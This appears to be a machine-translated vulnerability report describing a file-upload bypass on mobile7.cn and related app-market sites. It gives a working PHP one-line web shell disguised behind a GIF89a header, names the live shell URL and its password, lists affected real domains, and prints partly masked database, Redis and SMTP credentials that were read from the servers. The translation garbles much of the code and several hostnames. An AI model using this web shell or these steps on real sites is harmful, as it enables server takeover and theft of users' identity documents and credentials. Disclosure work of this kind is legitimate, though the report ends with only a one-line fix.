The getshell function of a website affects multiple business sites.
The getshell function of a website affects multiple business sites.
#1 in the wood ant's seventh media http://mobile7.cn registered a developer account, in the developer information --- financial information --- upload certificates there
Capture packets and change the suffix to php.
However, the server detects the file header.
The PHP file code is as follows:
GIF89a<?php @eval($_POST['pass']);?>
Verified by the server
The frontend directly returns the path
Kitchen Knife connection http://mobile7.cn/Public/upload/cache/3eab38bede51f782b04b7e31aa687bfc.php
Password: pass
Affected sites:
Wood ant wordpresspassport. mumayi. comwan. mumayi. comopen. mumayi. comandroid77.commobile7. cn119.cc
Leaked photos of developer ID cards and business licenses. Data volume not estimated
Database connection information exposed
/Var/html/corp_open/www.mobile7.cn/Conf/config.php
<? Php // configure return array ('url _ model' => 3, // if your environment does not support PATHINFO, set it to 3 'db _ type' => 'mysql ', 'db _ host' => '17 ******* 09 ', 'db _ name' =>'m ******** ayi ', 'db _ user' =>'m ******* yi ', 'db _ pwd' =>', A ******** Z ', 'db _ port' => '123', 'db _ prefix' => '******* _', 'session _ prefix' => 'think ', 'session _ EXPIRE '=> 3600*7, // default SESSION validity period 'url _ CASE_INSENSITIVE' => true, 'activity _ regist' => FALSE, // activity status 'tmp _ AUTH_UPLOAD_DIR '=> dirname (_ FILE __)));
/Var/html/corp_open/open_mumayi/market/redis. class. php
<?php$RedisConfig = @require_once("/mnt/html/redis_config/config.php");class EggRedis{public $host = '1*******4';public $port = 6***9;public $password = "m*********Ta";
/Var/html/corp_open/wan_mumayi/include/Email. php
//////////////////////////////////////// /// // Function _ construct () {$ this-> CharSet = 'utf-8'; $ this-> IsSMTP (); $ this-> SMTPAuth = true; // enable SMTP authentication // $ this-> SMTPSecure = "ssl"; // gmail sets the prefix to the servier $ this-> Host = "smtp.163.com "; // sets GMAIL as the SMTP server $ this-> Port = 25; // gmail set the SMTP port for the GMAIL server $ this-> Username = "c ******* el@163.com "; // smtp User $ this-> Password = 'W ******** 4 '; // smtp password $ this-> AddReplyTo ("c ******* l@163.com", "wood ant network "); // email to whom $ this-> From = "cui ******* el@163.com"; // sender's email $ this-> FromName = "wood ant network "; // sender's name
define('DBHOST', '1*******2');define('DBUSER', 'w*******yi');define('DBPASSWD', 'H*******f');define('DBNAME', 'w*******yi');define('DBPREFIX', 'w*******_');
Solution:
Set the directory of the uploaded file to not parse PHP